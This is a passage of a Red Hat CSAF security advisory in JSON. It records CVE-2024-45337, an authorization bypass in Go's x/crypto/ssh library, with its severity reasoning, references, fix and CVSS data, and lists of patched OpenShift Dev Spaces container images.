"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:ae275fed16fdc724d0e48659c3de940e4af3e0722d3b5d465634d31f5a2a972e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:edae16c9f7a40feaf051b22a05945fd3a51033d031b742346105cff657848881_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:24a8578aa65eaeb3fbbc4809db2bd8e57cd76cc6a96d94ce67aa22f1b5d4a4a5_amd64",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:2a9c66e55371adf209b5b317068e63cfbd9b3e27da9de210250607da8b3ffdff_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:90df466eef849a4fd6846345273968f875397d72f24c38445058d462d861ca9c_s390x",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:25b8dab260796cc1962ef2c31a6c8b98e258b1a9e8b13580da798a0074acd4e8_amd64",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:89d858f949b7bbc4502109ff8ab3cf0f416ad1a4c9432924669fc30eeba26b86_ppc64le",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:e1b46dd642b4391ece60c7bc3bb062ba81c3c975cb3723ade62f5a230a43ed5d_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:c98bbca9019281daafac3fb0ac3590258ca5c93ecc954e5127c1c99db4aa0315_amd64",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:e6d836b45dfb32da1a94114ab9908251da24adeeca932de89ba0e23d4f104e22_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:f6be90596ba55531a1ef7acf4041ed2828d4fe8a3cdd4e8b251bf4929bd19700_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "tar-fs: link following and path traversal via maliciously crafted tar file"
},
{
"cve": "CVE-2024-45337",
"cwe": {
"id": "CWE-285",
"name": "Improper Authorization"
},
"discovery_date": "2024-12-11T19:00:54.247490+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2331720"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the x/crypto/ssh go library. Applications and libraries that misuse the ServerConfig.PublicKeyCallback callback may be susceptible to an authorization bypass. For example, an attacker may send public keys A and B and authenticate with A. PublicKeyCallback would be called only twice, first with A and then with B. A vulnerable application may then make authorization decisions based on key B, for which the attacker does not control the private key. The misuse of ServerConfig.PublicKeyCallback may cause an authorization bypass.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang.org/x/crypto/ssh: Misuse of ServerConfig.PublicKeyCallback may cause authorization bypass in golang.org/x/crypto",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is classified as important rather than critical because it does not directly enable unauthorized access but rather introduces a risk of authorization bypass if the application or library misuses the PublicKeyCallback API. The vulnerability relies on incorrect assumptions made by the application when handling the sequence or state of keys provided during SSH authentication. Properly implemented systems that use the Permissions field or avoid relying on external state remain unaffected. Additionally, the vulnerability does not allow direct exploitation to gain control over a system without the presence of insecure logic in the application\u0027s handling of authentication attempts.\n\n\nRed Hat Enterprise Linux(RHEL) 8 \u0026 9 and Red Hat Openshift marked as not affected as it was determined that the problem function `ServerConfig.PublicKeyCallback`, as noted in the CVE-2024-45337 issue, is not called by Podman, Buildah, containers-common, or the gvisor-tap-vsock projects.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHOSDS-3:devspaces-tech-preview/idea-rhel9@sha256:e57eccb97cb2329af1654e27ad2ad30bb30de70c496b0e6e4353d2d0ce9274b8_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:6f3737f74c7659d65af8fe9a7cab165f8cdb1554b8ff963352885e1d9014ff27_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:82d121266eb9adca7faa9af0da6c89323cfe24add67bcba759a6a81ca161ba2f_s390x",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:9a8899c791034c3395c081fbe55746021d372ea1ea3523f2a72bf7e31a2a4132_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:08f2e3cd088b9d1176e61f8017126ecaa7447ade3aede5d63e49bd678b5cc30b_s390x",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:d36fb4add09a1576207fe4b114f60142a43b351d218b1f5d0807bacc19c02915_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:e48a0e27d13aff1bc60facd4ef3bd875f3b9c68b33c5d9be86dcf2fb46971d24_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:403b6c1ddb3fe9337fc1f83129d0b9e51dc18948df29f94212e291246b828e90_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:97544fe3e08648e8f0aec09dda768e884b0c213be0b833568747c797d492bb42_ppc64le",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:a47dcbcc9292e09c31ad8df74d54b58aa03db782700937365434407029c586d7_s390x",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:4fb48f0964049b6e56c71cac4973c8ec4ae53b3248ec842e58ec499736e3ffb7_ppc64le",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:bbb3292a84927c24cdef7aaff704cc12560172ba0c55021bf397d92f0f8c04c8_amd64",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:f894dcaddbc0dd33c9e524e33bf54416f08dd328838bbe2c869eb7201cf7ef1a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:b05f216166a75a5ae3f56495ea4f47a6c3b91d5405360cd991f7c9d545491150_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:ba152d33e05c8d53dd9c39249ba9756418619ff784ef1e4cb296a7aa1a33adfd_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:f463c35bfe9daac4929295c610f07935ff9655793b72d5fd040944fad8307c9a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:0cfde874c304561625ac5a838df9d90514bafddd5af6f7ed38f1476475497df3_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:23280e408cce44be3fc8ebf244b19f5e386da1e6fab218a1a3ee8a1748f132f9_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:e2b9c33d133573a466fead6c5f904d7ef31ba96d5fce1a619f3ff8c47d86a9da_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:4e11c662d89bb01653f32ed2f3bc66a67be8a1464e267a564a30e36d047b46a6_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:899c0fa0d3035a2da050c9dc765d2d5a1e79969ac8e5fe772e6dab003940c4b4_amd64",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:8de9e91840963be836e62c27395e7c37ebe1e908770a817197cb938fcf1777dc_ppc64le",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:0ce141da5a9eec8fd61d6beee7c993ed4731a4b25501fd3a8f261a4aeab2ccda_amd64",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:60f6c9724b2c7e773654d7fd176829661420b6a3eb9df7f72c3560e7890fe691_s390x",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:ac07b6bc8c311b357ab5e0545a2b80aa567c2f76b9ed01a3d382b5685b688c83_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:4c5430c1e53219652c27d861d7a7d577097db0dad05ded83b814275cb9a6cad2_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:7107f9bf1082a528e0f3af30a5b02e26a770b3430600596e37bebafa18fd0786_amd64",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:989fc72b261f44374f16ba8aa190791d04da8b295933f724a00bc31a84efd89e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:52ea2c5e3244363b1d131b8551c10abc687b18f95ca5b9f561f79041a6f06c21_amd64",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:ae275fed16fdc724d0e48659c3de940e4af3e0722d3b5d465634d31f5a2a972e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:edae16c9f7a40feaf051b22a05945fd3a51033d031b742346105cff657848881_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:24a8578aa65eaeb3fbbc4809db2bd8e57cd76cc6a96d94ce67aa22f1b5d4a4a5_amd64",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:2a9c66e55371adf209b5b317068e63cfbd9b3e27da9de210250607da8b3ffdff_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:90df466eef849a4fd6846345273968f875397d72f24c38445058d462d861ca9c_s390x",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:25b8dab260796cc1962ef2c31a6c8b98e258b1a9e8b13580da798a0074acd4e8_amd64",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:89d858f949b7bbc4502109ff8ab3cf0f416ad1a4c9432924669fc30eeba26b86_ppc64le",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:e1b46dd642b4391ece60c7bc3bb062ba81c3c975cb3723ade62f5a230a43ed5d_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:c98bbca9019281daafac3fb0ac3590258ca5c93ecc954e5127c1c99db4aa0315_amd64",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:e6d836b45dfb32da1a94114ab9908251da24adeeca932de89ba0e23d4f104e22_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:f6be90596ba55531a1ef7acf4041ed2828d4fe8a3cdd4e8b251bf4929bd19700_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45337"
},
{
"category": "external",
"summary": "RHBZ#2331720",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2331720"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45337"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45337",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45337"
},
{
"category": "external",
"summary": "https://github.com/golang/crypto/commit/b4f1988a35dee11ec3e05d6bf3e90b695fbd8909",
"url": "https://github.com/golang/crypto/commit/b4f1988a35dee11ec3e05d6bf3e90b695fbd8909"
},
{
"category": "external",
"summary": "https://go.dev/cl/635315",
"url": "https://go.dev/cl/635315"
},
{
"category": "external",
"summary": "https://go.dev/issue/70779",
"url": "https://go.dev/issue/70779"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/-nPEi39gI4Q/m/cGVPJCqdAQAJ",
"url": "https://groups.google.com/g/golang-announce/c/-nPEi39gI4Q/m/cGVPJCqdAQAJ"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2024-3321",
"url": "https://pkg.go.dev/vuln/GO-2024-3321"
}
],
"release_date": "2024-12-11T18:55:58.506000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-05-28T02:39:39+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHOSDS-3:devspaces-tech-preview/idea-rhel9@sha256:e57eccb97cb2329af1654e27ad2ad30bb30de70c496b0e6e4353d2d0ce9274b8_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:6f3737f74c7659d65af8fe9a7cab165f8cdb1554b8ff963352885e1d9014ff27_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:82d121266eb9adca7faa9af0da6c89323cfe24add67bcba759a6a81ca161ba2f_s390x",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:9a8899c791034c3395c081fbe55746021d372ea1ea3523f2a72bf7e31a2a4132_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:08f2e3cd088b9d1176e61f8017126ecaa7447ade3aede5d63e49bd678b5cc30b_s390x",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:d36fb4add09a1576207fe4b114f60142a43b351d218b1f5d0807bacc19c02915_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:e48a0e27d13aff1bc60facd4ef3bd875f3b9c68b33c5d9be86dcf2fb46971d24_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:403b6c1ddb3fe9337fc1f83129d0b9e51dc18948df29f94212e291246b828e90_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:97544fe3e08648e8f0aec09dda768e884b0c213be0b833568747c797d492bb42_ppc64le",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:a47dcbcc9292e09c31ad8df74d54b58aa03db782700937365434407029c586d7_s390x",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:4fb48f0964049b6e56c71cac4973c8ec4ae53b3248ec842e58ec499736e3ffb7_ppc64le",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:bbb3292a84927c24cdef7aaff704cc12560172ba0c55021bf397d92f0f8c04c8_amd64",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:f894dcaddbc0dd33c9e524e33bf54416f08dd328838bbe2c869eb7201cf7ef1a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:b05f216166a75a5ae3f56495ea4f47a6c3b91d5405360cd991f7c9d545491150_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:ba152d33e05c8d53dd9c39249ba9756418619ff784ef1e4cb296a7aa1a33adfd_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:f463c35bfe9daac4929295c610f07935ff9655793b72d5fd040944fad8307c9a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:0cfde874c304561625ac5a838df9d90514bafddd5af6f7ed38f1476475497df3_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:23280e408cce44be3fc8ebf244b19f5e386da1e6fab218a1a3ee8a1748f132f9_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:e2b9c33d133573a466fead6c5f904d7ef31ba96d5fce1a619f3ff8c47d86a9da_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:4e11c662d89bb01653f32ed2f3bc66a67be8a1464e267a564a30e36d047b46a6_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:899c0fa0d3035a2da050c9dc765d2d5a1e79969ac8e5fe772e6dab003940c4b4_amd64",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:8de9e91840963be836e62c27395e7c37ebe1e908770a817197cb938fcf1777dc_ppc64le",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:0ce141da5a9eec8fd61d6beee7c993ed4731a4b25501fd3a8f261a4aeab2ccda_amd64",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:60f6c9724b2c7e773654d7fd176829661420b6a3eb9df7f72c3560e7890fe691_s390x",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:ac07b6bc8c311b357ab5e0545a2b80aa567c2f76b9ed01a3d382b5685b688c83_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:4c5430c1e53219652c27d861d7a7d577097db0dad05ded83b814275cb9a6cad2_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:7107f9bf1082a528e0f3af30a5b02e26a770b3430600596e37bebafa18fd0786_amd64",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:989fc72b261f44374f16ba8aa190791d04da8b295933f724a00bc31a84efd89e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:52ea2c5e3244363b1d131b8551c10abc687b18f95ca5b9f561f79041a6f06c21_amd64",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:ae275fed16fdc724d0e48659c3de940e4af3e0722d3b5d465634d31f5a2a972e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:edae16c9f7a40feaf051b22a05945fd3a51033d031b742346105cff657848881_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:24a8578aa65eaeb3fbbc4809db2bd8e57cd76cc6a96d94ce67aa22f1b5d4a4a5_amd64",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:2a9c66e55371adf209b5b317068e63cfbd9b3e27da9de210250607da8b3ffdff_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:90df466eef849a4fd6846345273968f875397d72f24c38445058d462d861ca9c_s390x",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:25b8dab260796cc1962ef2c31a6c8b98e258b1a9e8b13580da798a0074acd4e8_amd64",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:89d858f949b7bbc4502109ff8ab3cf0f416ad1a4c9432924669fc30eeba26b86_ppc64le",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:e1b46dd642b4391ece60c7bc3bb062ba81c3c975cb3723ade62f5a230a43ed5d_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:c98bbca9019281daafac3fb0ac3590258ca5c93ecc954e5127c1c99db4aa0315_amd64",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:e6d836b45dfb32da1a94114ab9908251da24adeeca932de89ba0e23d4f104e22_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:f6be90596ba55531a1ef7acf4041ed2828d4fe8a3cdd4e8b251bf4929bd19700_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:8244"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHOSDS-3:devspaces-tech-preview/idea-rhel9@sha256:e57eccb97cb2329af1654e27ad2ad30bb30de70c496b0e6e4353d2d0ce9274b8_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:6f3737f74c7659d65af8fe9a7cab165f8cdb1554b8ff963352885e1d9014ff27_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:82d121266eb9adca7faa9af0da6c89323cfe24add67bcba759a6a81ca161ba2f_s390x",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:9a8899c791034c3395c081fbe55746021d372ea1ea3523f2a72bf7e31a2a4132_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:08f2e3cd088b9d1176e61f8017126ecaa7447ade3aede5d63e49bd678b5cc30b_s390x",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:d36fb4add09a1576207fe4b114f60142a43b351d218b1f5d0807bacc19c02915_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:e48a0e27d13aff1bc60facd4ef3bd875f3b9c68b33c5d9be86dcf2fb46971d24_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:403b6c1ddb3fe9337fc1f83129d0b9e51dc18948df29f94212e291246b828e90_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:97544fe3e08648e8f0aec09dda768e884b0c213be0b833568747c797d492bb42_ppc64le",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:a47dcbcc9292e09c31ad8df74d54b58aa03db782700937365434407029c586d7_s390x",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:4fb48f0964049b6e56c71cac4973c8ec4ae53b3248ec842e58ec499736e3ffb7_ppc64le",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:bbb3292a84927c24cdef7aaff704cc12560172ba0c55021bf397d92f0f8c04c8_amd64",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:f894dcaddbc0dd33c9e524e33bf54416f08dd328838bbe2c869eb7201cf7ef1a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:b05f216166a75a5ae3f56495ea4f47a6c3b91d5405360cd991f7c9d545491150_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:ba152d33e05c8d53dd9c39249ba9756418619ff784ef1e4cb296a7aa1a33adfd_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:f463c35bfe9daac4929295c610f07935ff9655793b72d5fd040944fad8307c9a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:0cfde874c304561625ac5a838df9d90514bafddd5af6f7ed38f1476475497df3_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:23280e408cce44be3fc8ebf244b19f5e386da1e6fab218a1a3ee8a1748f132f9_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:e2b9c33d133573a466fead6c5f904d7ef31ba96d5fce1a619f3ff8c47d86a9da_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:4e11c662d89bb01653f32ed2f3bc66a67be8a1464e267a564a30e36d047b46a6_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:899c0fa0d3035a2da050c9dc765d2d5a1e79969ac8e5fe772e6dab003940c4b4_amd64",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:8de9e91840963be836e62c27395e7c37ebe1e908770a817197cb938fcf1777dc_ppc64le",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:0ce141da5a9eec8fd61d6beee7c993ed4731a4b25501fd3a8f261a4aeab2ccda_amd64",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:60f6c9724b2c7e773654d7fd176829661420b6a3eb9df7f72c3560e7890fe691_s390x",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:ac07b6bc8c311b357ab5e0545a2b80aa567c2f76b9ed01a3d382b5685b688c83_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:4c5430c1e53219652c27d861d7a7d577097db0dad05ded83b814275cb9a6cad2_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:7107f9bf1082a528e0f3af30a5b02e26a770b3430600596e37bebafa18fd0786_amd64",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:989fc72b261f44374f16ba8aa190791d04da8b295933f724a00bc31a84efd89e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:52ea2c5e3244363b1d131b8551c10abc687b18f95ca5b9f561f79041a6f06c21_amd64",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:ae275fed16fdc724d0e48659c3de940e4af3e0722d3b5d465634d31f5a2a972e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:edae16c9f7a40feaf051b22a05945fd3a51033d031b742346105cff657848881_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:24a8578aa65eaeb3fbbc4809db2bd8e57cd76cc6a96d94ce67aa22f1b5d4a4a5_amd64",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:2a9c66e55371adf209b5b317068e63cfbd9b3e27da9de210250607da8b3ffdff_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:90df466eef849a4fd6846345273968f875397d72f24c38445058d462d861ca9c_s390x",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:25b8dab260796cc1962ef2c31a6c8b98e258b1a9e8b13580da798a0074acd4e8_amd64",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:89d858f949b7bbc4502109ff8ab3cf0f416ad1a4c9432924669fc30eeba26b86_ppc64le",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:e1b46dd642b4391ece60c7bc3bb062ba81c3c975cb3723ade62f5a230a43ed5d_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:c98bbca9019281daafac3fb0ac3590258ca5c93ecc954e5127c1c99db4aa0315_amd64",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:e6d836b45dfb32da1a94114ab9908251da24adeeca932de89ba0e23d4f104e22_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:f6be90596ba55531a1ef7acf4041ed2828d4fe8a3cdd4e8b251bf4929bd19700_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"9Base-RHOSDS-3:devspaces-tech-preview/idea-rhel9@sha256:e57eccb97cb2329af1654e27ad2ad30bb30de70c496b0e6e4353d2d0ce9274b8_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:6f3737f74c7659d65af8fe9a7cab165f8cdb1554b8ff963352885e1d9014ff27_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:82d121266eb9adca7faa9af0da6c89323cfe24add67bcba759a6a81ca161ba2f_s390x",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:9a8899c791034c3395c081fbe55746021d372ea1ea3523f2a72bf7e31a2a4132_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:08f2e3cd088b9d1176e61f8017126ecaa7447ade3aede5d63e49bd678b5cc30b_s390x",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:d36fb4add09a1576207fe4b114f60142a43b351d218b1f5d0807bacc19c02915_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:e48a0e27d13aff1bc60facd4ef3bd875f3b9c68b33c5d9be86dcf2fb46971d24_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:403b6c1ddb3fe9337fc1f83129d0b9e51dc18948df29f94212e291246b828e90_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:97544fe3e08648e8f0aec09dda768e884b0c213be0b833568747c797d492bb42_ppc64le",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:a47dcbcc9292e09c31ad8df74d54b58aa03db782700937365434407029c586d7_s390x",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:4fb48f0964049b6e56c71cac4973c8ec4ae53b3248ec842e58ec499736e3ffb7_ppc64le",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:bbb3292a84927c24cdef7aaff704cc12560172ba0c55021bf397d92f0f8c04c8_amd64",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:f894dcaddbc0dd33c9e524e33bf54416f08dd328838bbe2c869eb7201cf7ef1a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:b05f216166a75a5ae3f56495ea4f47a6c3b91d5405360cd991f7c9d545491150_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:ba152d33e05c8d53dd9c39249ba9756418619ff784ef1e4cb296a7aa1a33adfd_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:f463c35bfe9daac4929295c610f07935ff9655793b72d5fd040944fad8307c9a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:0cfde874c304561625ac5a838df9d90514bafddd5af6f7ed38f1476475497df3_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:23280e408cce44be3fc8ebf244b19f5e386da1e6fab218a1a3ee8a1748f132f9_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:e2b9c33d133573a466fead6c5f904d7ef31ba96d5fce1a619f3ff8c47d86a9da_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:4e11c662d89bb01653f32ed2f3bc66a67be8a1464e267a564a30e36d047b46a6_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:899c0fa0d3035a2da050c9dc765d2d5a1e79969ac8e5fe772e6dab003940c4b4_amd64",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:8de9e91840963be836e62c27395e7c37ebe1e908770a817197cb938fcf1777dc_ppc64le",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:0ce141da5a9eec8fd61d6beee7c993ed4731a4b25501fd3a8f261a4aeab2ccda_amd64",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:60f6c9724b2c7e773654d7fd176829661420b6a3eb9df7f72c3560e7890fe691_s390x",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:ac07b6bc8c311b357ab5e0545a2b80aa567c2f76b9ed01a3d382b5685b688c83_ppc64le",
